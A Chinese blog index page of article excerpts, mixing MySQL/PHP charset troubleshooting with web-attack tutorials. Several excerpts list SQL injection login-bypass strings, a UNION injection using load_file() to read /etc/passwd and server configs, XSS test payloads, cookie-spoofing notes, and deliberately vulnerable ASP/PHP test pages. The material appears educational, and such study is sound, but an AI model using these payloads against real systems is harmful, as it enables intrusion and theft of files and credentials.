摘要:
在前面已经为大家演示了如何利用工具进行cookie欺骗,然后进入后台。现在我们从程序的角度上来学习如何挖掘代码中存在的cookie欺骗漏洞。还是以第二章中的那个心情网络投票系统来举例。我们先来看看在心情网络投票系统中系统是如何得到cookie的,它的程序其实就上上一节中采用cookie验证的那个例子,代码这里不在列举出来了,可以参考上面的。在上面的代码中,有样的两行代码:response.cookies("admin")=rs("admin")response.cookies("pass")=rs("pass")当 阅读全文
摘要:
1:"or "a"="a2:'.).or.('.a.'='.a3:or 1=1--4:'or 1=1--5:a'or' 1=1--6:"or 1=1--7:'or.'a.'='a8:"or"="a'='a9:'or''='10:'or'='or' 阅读全文
摘要:
经典'or'='or'漏洞也叫身份验证登陆漏洞,这是一个比较老的漏洞,不过目前很多系统还是存在这样的漏洞。前面我们已经知道了利用'or'='or'这个漏洞我们就可以顺利的登陆网站后台,那么为什么输入这样的代码就可以进入后台呢?在讲这个漏洞之前我们先来回顾一点点数学知识。就是AND和OR运算符的运算规则,在第5章也讲了,不过为了给大家加深印象,这里还把他们的运算规则列出来。如果在一个关系式里,同时了AND和OR运算符,就会有一个优先级的问题,如果是相同的逻辑符,则按照从左到右的运算顺序。逻辑运算符AND和OR的运算优先次序是:先运算 阅读全文
摘要:
一、load_file()函数的应用1.获得字段数order by nand 1=2 union select 1,22.load_file()获取敏感信息读取c:\boot.ini信息,要用十六进制的形式and 1=2 union select 1,load_file(0x633A5C626F6F742E696E69)其他敏感信息load_file(char(47)) 列出freebsd目录/etc/passwd读取httpd.conf/etc/init.d/apache/etc/init.d/apache2/etc/httpd/httpd.conf/etc/apache/apache.co 阅读全文
摘要:
转自:博客水木 http://shuimu.js.cn/mysql-php-character-set-encoding-settings-and-garbled-solution.htmlPHP显示MySQL查询结果时显示乱码对于新手在实际编程中是经常会遇到的问题,我们在接下来的文章中将会为大家具体介绍PMySQL字符集编码设置与PHP显示乱码的解决办法,希望对有需要的朋友们有所帮助。从乱码产生的原因来分析,乱码的产生一般有以下几种情况。1、网页编码与程序编码不一致的问题所谓的网页编码问题就是指你的html代码中定义的“charset”,例如以下这段代码:<head><ti 阅读全文
摘要:
转自:博客水木 http://shuimu.js.cn/php-mysql-dynamic-web-programming-error-correction-guide.html在WEB编程当中,数据库的作用已经越来越不容忽视。提到数据库,应当说PHP具有非常强大的数据库支持功能,从Access到Oracle,几乎 与所有的数据库系统都可以实现无缝连接。为了方便本文的讲解,我们将主要以MySQL为例进行说明。不过对于其它的数据库应用也同样适用。使用PHP进行数据库操作一般需要包括以下语句:<?php$Host="localhost";$MySQL_UserName=& 阅读全文
摘要:
<html><head><title>mysql注入漏洞测试</title></head><body><?php$mysql_server_name='localhost';$mysql_username='root';$mysql_password='shanmao';$conn=mysql_connect($mysql_server_name,$mysql_username,$mysql_password)or die('Could not connect: 阅读全文
摘要:
转自:http://www.2cto.com/database/201208/150897.html设置MySql5.5数据库的字符编码为UTF8,解决中文乱码问题1.在mysql压缩目录下,有一堆的参数配置文件,比如:my-small.ini,复制一下这个文件,自己改下名字,比如叫:my.ini 2.打开my.ini文件,增加如下参数: [client]:增加default-character-set=utf8参数 [client] #password = [your_password] port = 3306 socket = /tmp/mysql.sock default-charact 阅读全文
摘要:
1.标准的xss漏洞测试代码<script>alert('xss')</script>2.img图片标记属性跨站攻击代码<img src="javascript:alert(/xss/)"></img><img dynsrc="javascript:alert('xss')">3.无需"<>",利用html标记事件属性跨站(1)利用已知事件<img src="" onerror=alert("xs 阅读全文
摘要:
<% //这是ASP的标记str=trim(request("a")) //request对象作用是获取客户端表单中输入的数据response.write str //response也是ASP的一个对象,write是它的一个方法,其作用是往页面中输出//数据,在这里就是在页面中输出strresponse.write "<br>"response.write "<img src="&str&"></img>"%><form action=xss. 阅读全文